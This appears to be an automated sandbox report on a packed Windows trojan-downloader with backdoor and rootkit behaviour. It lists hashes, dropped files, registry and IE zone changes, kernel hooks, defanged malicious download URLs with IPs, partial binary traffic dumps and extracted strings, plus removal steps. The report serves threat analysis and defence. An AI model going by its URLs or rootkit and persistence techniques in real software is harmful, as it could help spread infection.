Trojan-Downloader.Win32.Geral.ssc (Kaspersky), Trojan.Agent.AQSI (B) (Emsisoft), Trojan.Agent.AQSI (AdAware), Backdoor.Win32.Farfli.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0e035b78e94e2e4f1ff3db390148d1cc
SHA1: 00037ae1265de8536a1bbcf680475663aa648b81
SHA256: 8edcc5c35a38e58bf46384bac2e65e32cb11fc2bb047ac4d50ce630ba9d420ae
SSDeep: 768:17ugUsUymtvYGYXQQYKeYkNM rZOgk2pfArfiS3 :1CQULBYG4QQY9YYM EZAE/
Size: 37473 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: WinUpackv030beta, Upackv032BetaPatch, PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 1970-01-01 03:00:00
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
sc.exe:612
sc.exe:1572
sc.exe:1776
OneG2190828.exe:1548
runonce.exe:340
The Trojan injects its code into the following process(es):
%original file name%.exe:1696
cc2178718.exe:744
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutexZonesCacheCounterMutexZonesCounterMutexShimCacheMutexLDMMOO.
File activity
The process %original file name%.exe:1696 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cc2178718.exe (16 bytes)
%System%\wbem\Logs (4 bytes)
%WinDir%\inf\oem10.inf (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (8 bytes)
%Documents and Settings%\%current user%\Local Settings (8 bytes)
%WinDir%\5717.mp4 (58 bytes)
%WinDir%\Temp\Perflib_Perfdata_7a8.dat (4 bytes)
%Documents and Settings%\All Users (4 bytes)
%WinDir% (192 bytes)
C:\$Directory (12 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5 (4 bytes)
%System%\jsseting.data (16 bytes)
%System% (1920 bytes)
%System%\config\SysEvent.Evt (168 bytes)
%Program Files%\RAV\CCtest.inf (4 bytes)
C:\PROGRAM FILES (96 bytes)
%Program Files%\RAV\CCtest.sys (7 bytes)
%System%\drivers\pcidump.sys (11 bytes)
%System%\config (96 bytes)
%WinDir%\inf\oem10.PNF (18746 bytes)
%System%\drivers (96 bytes)
%Documents and Settings%\%current user% (4 bytes)
%Program Files%\RAV\CCtest.dll (10 bytes)
%WinDir%\setupapi.log (32472 bytes)
%System%\drivers\SET41.tmp (7 bytes)
%Documents and Settings%\%current user%\Cookies (96 bytes)
The Trojan deletes the following file(s):
%WinDir%\5717.mp4 (0 bytes)
%Program Files%\RAV\CCtest.inf (0 bytes)
%Program Files%\RAV\CCtest.dll (0 bytes)
%System%\drivers\SET41.tmp (0 bytes)
%Program Files%\RAV\CCtest.sys (0 bytes)
%System%\drivers\pcidump.sys (0 bytes)
%System%\jsseting.data (0 bytes)
The process OneG2190828.exe:1548 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\Rwmltcy.cc3 (75 bytes)
The process cc2178718.exe:744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ope42.tmp (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2180875.exe (5572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2190828.exe (11028 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ope42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2180875.exe (0 bytes)
Registry activity
The process sc.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D B4 1A 1A 7A 81 93 86 56 61 73 80 FD 3F 70 C0"
The process sc.exe:1572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 43 C2 7B 8E AF 29 D3 B4 4E 69 B7 F8 AE 40 13"
The process sc.exe:1776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 42 FB 27 21 A0 A2 40 76 B2 96 35 E3 11 92 00"
The process %original file name%.exe:1696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"MatchingDeviceId" = "*cctestdevice"
"InfSection" = "CCTest_DDI"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}]
"Icon" = "-18"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"InfPath" = "oem10.inf"
"ProviderName" = "Microsoft"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}]
"Class" = "CCTest"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}]
"(Default)" = "Class for CCTest devices"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"Extended Base" = "05 00 00 00 01 00 00 00 02 00 00 00 04 00 00 00"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"InfSectionExt" = ".NT"
"DriverVersion" = "1.0.0.0"
"DriverDate" = "5-7-2010"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 AE 9A 60 EF 5E 99 54 75 F5 A9 19 8E C2 4F B3"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"DriverDateData" = "00 80 7A 3C 78 ED CA 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"reg.exe" = "Registry Console Tool"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"DriverDesc" = "CCTest Device"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process runonce.exe:340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 BD EA 62 6F C9 3F 6C E9 C7 79 83 FE 20 A1 60"
Dropped PE files
| MD5 | File path |
|---|---|
| 2c2b4c8ad5022846aa424076a31c961c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\cc2178718.exe |
| 23de22dc74b2878b72fc1e71f6026d5f | c:\WINDOWS\system32\Rwmltcy.cc3 |
| 62a291ddfc8d86b4164d195211cf90d9 | c:\WINDOWS\system32\drivers\CCTest.sys |
| add4832059173fcdb135d949194ad52b | c:\WINDOWS\system32\jsseting.data |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following kernel-mode hooks:
ZwQuerySystemInformation
Using the driver "%System%\drivers\pcidump.sys" the Trojan substitutes IRP handlers in a file system driver (NTFS) to control operations with files:
MJ_CREATE
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
sc.exe:612
sc.exe:1572
sc.exe:1776
OneG2190828.exe:1548
runonce.exe:340 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\cc2178718.exe (16 bytes)
%System%\wbem\Logs (4 bytes)
%WinDir%\inf\oem10.inf (4 bytes)
%WinDir%\5717.mp4 (58 bytes)
%WinDir%\Temp\Perflib_Perfdata_7a8.dat (4 bytes)
%Documents and Settings%\All Users (4 bytes)
C:\$Directory (12 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5 (4 bytes)
%System%\jsseting.data (16 bytes)
%System%\config\SysEvent.Evt (168 bytes)
%Program Files%\RAV\CCtest.inf (4 bytes)
C:\PROGRAM FILES (96 bytes)
%Program Files%\RAV\CCtest.sys (7 bytes)
%System%\drivers\pcidump.sys (11 bytes)
%WinDir%\inf\oem10.PNF (18746 bytes)
%Program Files%\RAV\CCtest.dll (10 bytes)
%WinDir%\setupapi.log (32472 bytes)
%System%\drivers\SET41.tmp (7 bytes)
%Documents and Settings%\%current user%\Cookies (96 bytes)
%System%\Rwmltcy.cc3 (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope42.tmp (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2180875.exe (5572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2190828.exe (11028 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .Upack | 4096 | 139264 | 512 | 1.96068 | f92dea8a39a051133c79752ab6289945 |
| .rsrc | 143360 | 69632 | 36961 | 5.5417 | 406e6de271cf332038f71d0543efba3a |
Dropped from:
Downloaded by:
0e035b78e94e2e4f1ff3db390148d1cc
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://s-56350.gotocdn.com/templates/6000.exe | |
| hxxp://s-56350.gotocdn.com/templates/sc.exe | |
| hxxp://www.gaopinhanhsteel.com/templates/sc.exe | 113.10.149.127 |
| hxxp://www.gaopinhanhsteel.com/templates/6000.exe | 113.10.149.127 |
| mateng1761.f3322.org | 42.51.155.159 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /templates/6000.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.gaopinhanhsteel.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 22 Oct 2014 18:29:30 GMT
Content-Length: 37473
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.gaopinhanhsteel.com/templates/6000.exe
Last-Modified: Wed, 17 Sep 2014 15:03:36 GMT
Accept-Ranges: bytes
ETag: "996a9f8e88d2cf1:21f50"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MZKERNEL32.DLL..LoadLibraryA....GetProcAddress.......ByDwing@...PE..L......................2............0.............@..........................@..............................................9...(....................................................................................................................Upack... ..........................`....rsrc........0..a...................`...d.B......0B...............................@...B...B...B...B...B.|.........@.W.B.Y.B...B.."B.....5.B...B.K.B..............o..O...7j...jG.....m..'nA....77.X.Yj.V......h:..WW.r..(..%..!z1.b...t&...B>.UhB[....b.5.Y[....dC....-.......O..$....{.f....9.s.@..........)".g@9.,T..[.j;|...m..^....1...n?.*..f....e.u$$..h.?..'.Bu..|.*.U.P....~...w.Fr..{!c....3,....O2w..,q...S.s...d. '.V..n.............]"\..F^.h.Z..!.......y..S...`Di..)...j,.K.M.\/b_...R...k.....A..-."^......B'..c-/$...?x.{..p.O.r.7...8..C...`L...S....`CW...............)V0J...e/..H.Eh...}.....v.4.......H...1....B....l._.....$.AT.....#g.t.G..l..{.F}...J(.V^...#.PWk....?.=SX5.Z.g...e.I.....q..I.....k.@'....KCa..K.-=..e..[}.VN..m.0d..7...}.H...p..r...{2{.-"x!.U,...>...Y/.d...9K...}.....3@.....q(....W...xP...J..>}...m.....<..{..%.j."A........T....NN.^...%PI.....|9r.qm..\i..*Q@DG.....7.n. ..S8SvZ\......[H7hz...ljI/.....'../'[.U.'Gs...k............).v..y./...E..._..~..>v..hj...q:......'.Z.O=.`1.=......n.q....M.D.oQ.......j.z.....A.{.XG..x..<>x:....s..C..~.*. ...l?...08.IHZ..N@4o..h ...0.m)..PM....[j^....$..^B. .._....ub.....o.4.....x...@G.....C..0%...y.y......
<<< skipped >>>
GET /templates/sc.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.gaopinhanhsteel.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 22 Oct 2014 18:29:34 GMT
Content-Length: 78848
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.gaopinhanhsteel.com/templates/sc.exe
Last-Modified: Wed, 17 Sep 2014 15:03:10 GMT
Accept-Ranges: bytes
ETag: "535efc7e88d2cf1:21f50"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MZ......................@............................................i.L.i.L.i.L.O.L.i.L.i.L.i.L.f.L.i.L7v.L.i.L.o.L.i.LRich.i.L................PE..L.....yN.....................*............... ....@..........................p..............................................l ..<....`............................................................................... ..l............................text...z........................... ..`.rdata....... ......................@..@.data...H ...0..."..................@....rsrc........`.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................V.t$.W.|$.;.u..._^.... @.P.3.......5...... ..F......_^..............L$..T$..D$..L$..L$.R.T$.QPR.D$.... @.....D$.u.... @...t............D$..T$.....................(...U3.VUj..........tnS.D$.WPV.D$.(....y.....tA..$<...... @..L$4QW....t#.T$.RV.K.....u.V... @._[..^]..(.........V... @._[..^]..(......^]..(.....................`....D$TSUVWh....3.PV..L @.....0....L$dh.....T$hQR..H @...........$h...h....Ph.PA...D @..........L$dh.PA.Q..$t...h.PA.R..d @......$l.....$h...PQ..@ @...< @.3..T$......3..|$$.T$.h...
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1696:
MZKERNEL32.DLL
MZKERNEL32.DLL
.Upack
.Upack
.rsrc
.rsrc
.data
.data
.reloc
.reloc
Acr@ojcTcrtocpgjViohrctu&`gojcb'
Acr@ojcTcrtocpgjViohrctu&`gojcb'
\drivers\gm.dls
\drivers\gm.dls
\drivers\pcidump.sys
\drivers\pcidump.sys
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ADVAPI32.dll
ADVAPI32.dll
khy.dll
khy.dll
; File Name: CCTest.inf
; File Name: CCTest.inf
; Generated by C DriverWizard 3.2.0 (Build 2485)
; Generated by C DriverWizard 3.2.0 (Build 2485)
Signature="$WINDOWS NT$"
Signature="$WINDOWS NT$"
ClassGUID={D4A133FE-C9E5-4F11-A812-FED74DA86ED5}
ClassGUID={D4A133FE-C9E5-4F11-A812-FED74DA86ED5}
DriverVer=5/7/2010,1.00.0000
DriverVer=5/7/2010,1.00.0000
CatalogFile=CCTest.cat
CatalogFile=CCTest.cat
;reg-root,[subkey],[value-entry-name],[flags],[value]
;reg-root,[subkey],[value-entry-name],[flags],[value]
HKR,,,%REG_SZ%,ÞviceClassName%
HKR,,,%REG_SZ%,ÞviceClassName%
1 = %DiskId1%,,,""
1 = %DiskId1%,,,""
CCTest.sys = 1,,
CCTest.sys = 1,,
ÃŒTest_DeviceDesc$=CCTest_DDI, *CCTestDevice
ÃŒTest_DeviceDesc$=CCTest_DDI, *CCTestDevice
; --------- Windows 98 -----------------
; --------- Windows 98 -----------------
; cause problems in Windows 98
; cause problems in Windows 98
HKR,,NTMPDriver,,CCTest.sys
HKR,,NTMPDriver,,CCTest.sys
HKR,,Description,,ÃŒTest_DeviceDesc%
HKR,,Description,,ÃŒTest_DeviceDesc%
; --------- Windows NT -----------------
; --------- Windows NT -----------------
[CCTest_DDI.NT]
[CCTest_DDI.NT]
[CCTest_DDI.NT.Services]
[CCTest_DDI.NT.Services]
Addservice = CCTest, %FLG_ADDREG_NOCLOBBER%, CCTest_Service
Addservice = CCTest, %FLG_ADDREG_NOCLOBBER%, CCTest_Service
DisplayName = ÃŒTest_SvcDesc%
DisplayName = ÃŒTest_SvcDesc%
ServiceType = %SERVICE_KERNEL_DRIVER%
ServiceType = %SERVICE_KERNEL_DRIVER%
StartType = %SERVICE_DEMAND_START%
StartType = %SERVICE_DEMAND_START%
ErrorControl = %SERVICE_ERROR_NORMAL%
ErrorControl = %SERVICE_ERROR_NORMAL%
ServiceBinary = %\CCTest.sys
ServiceBinary = %\CCTest.sys
CCTest.sys,,,2
CCTest.sys,,,2
FLG_ADDREG_KEYONLY = 0x00000010
FLG_ADDREG_KEYONLY = 0x00000010
FLG_ADDREG_64BITKEY = 0x00001000
FLG_ADDREG_64BITKEY = 0x00001000
FLG_ADDREG_KEYONLY_COMMON = 0x00002000
FLG_ADDREG_KEYONLY_COMMON = 0x00002000
FLG_ADDREG_32BITKEY = 0x00004000
FLG_ADDREG_32BITKEY = 0x00004000
.text
.text
h.data
h.data
B.reloc
B.reloc
D:\5-20\9\CCTest\Driver\objfre\i386\CCTest.pdb
D:\5-20\9\CCTest\Driver\objfre\i386\CCTest.pdb
ZwCreateKey
ZwCreateKey
ntoskrnl.exe
ntoskrnl.exe
HAL.dll
HAL.dll
`.CRT
`.CRT
.tls0
.tls0
.reloc
.reloc
hXXp://host
hXXp://host
hXXp://count
hXXp://count
2014-8-1
2014-8-1
000000000000
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
iphlpapi.dll
Windows7
Windows7
Windows2000
Windows2000
WindowsXP
WindowsXP
Windows2003
Windows2003
Windows98
Windows98
WindowsNT
WindowsNT
hXXp://downpath
hXXp://downpath
%sOneG%d.exe
%sOneG%d.exe
SSSSh
SSSSh
YYSSSSh
YYSSSSh
WinExec
WinExec
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegCreateKeyA
RegCreateKeyA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoA
HttpQueryInfoA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
WININET.dll
WININET.dll
MSVCP60.dll
MSVCP60.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
MSVCRT.dll
MSVCRT.dll
advapi32.dll
advapi32.dll
kdll.dll
kdll.dll
setupapi.dll
setupapi.dll
shell32.dll
shell32.dll
reg.exe
reg.exe
import
import
\5717.mp4
\5717.mp4
jsseting.data
jsseting.data
%scc%d.exe
%scc%d.exe
KERNEL32.DLL
KERNEL32.DLL
GetCPInfo
GetCPInfo
USER32.DLL
USER32.DLL
SETUPAPI.DLL
SETUPAPI.DLL
w.Nps
w.Nps
B).pA)
B).pA)
7Vn%c:
7Vn%c:
83.XW
83.XW
u%u#@
u%u#@
JNh.VV{
JNh.VV{
U%UR]
U%UR]
Windows NT\
Windows NT\
Image File Execution Options\
Image File Execution Options\
svchost.exe
svchost.exe
CCTest.sys
CCTest.sys
Windows Registry Editor Version 5.00
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local]
"ActivePolicy"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ActivePolicy"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{72385235-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{72385235-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{72385235-70fa-11d1-864c-14a300000000}"
"name"="ipsecFilter{72385235-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385235-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385235-70fa-11d1-864c-14a300000000}"
00,00,00,00,00,00,00
00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}"
"name"="ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523a-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523a-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}"
"name"="ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{3f91a81a-7647-11d1-864d-d46a00000000}"
"ipsecNegotiationPolicyAction"="{3f91a81a-7647-11d1-864d-d46a00000000}"
"ipsecNegotiationPolicyType"="{62f49e10-6c37-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyType"="{62f49e10-6c37-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}]
"name"="ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"name"="ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"ipsecID"="{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"ipsecID"="{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}]
"name"="ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}"
"name"="ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385234-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385234-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}]
"name"="ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"name"="ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecID"="{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecID"="{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}]
"name"="ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"name"="ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecID"="{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecID"="{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecNegotiationPolicyAction"="{3f91a819-7647-11d1-864d-d46a00000000}"
"ipsecNegotiationPolicyAction"="{3f91a819-7647-11d1-864d-d46a00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}"
"name"="ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385233-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385233-70fa-11d1-864c-14a300000000}"
00,00,00,00
00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}"
"name"="ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{8a171dd2-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyAction"="{8a171dd2-77e3-11d1-8659-a04f00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}]
"name"="ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"name"="ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecID"="{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecID"="{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecNegotiationPolicyAction"="{8a171dd3-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyAction"="{8a171dd3-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyType"="{62f49e13-6c37-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyType"="{62f49e13-6c37-11d1-864c-14a300000000}"
00,00,00,00,00,00,00,00,00
00,00,00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}]
"name"="ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
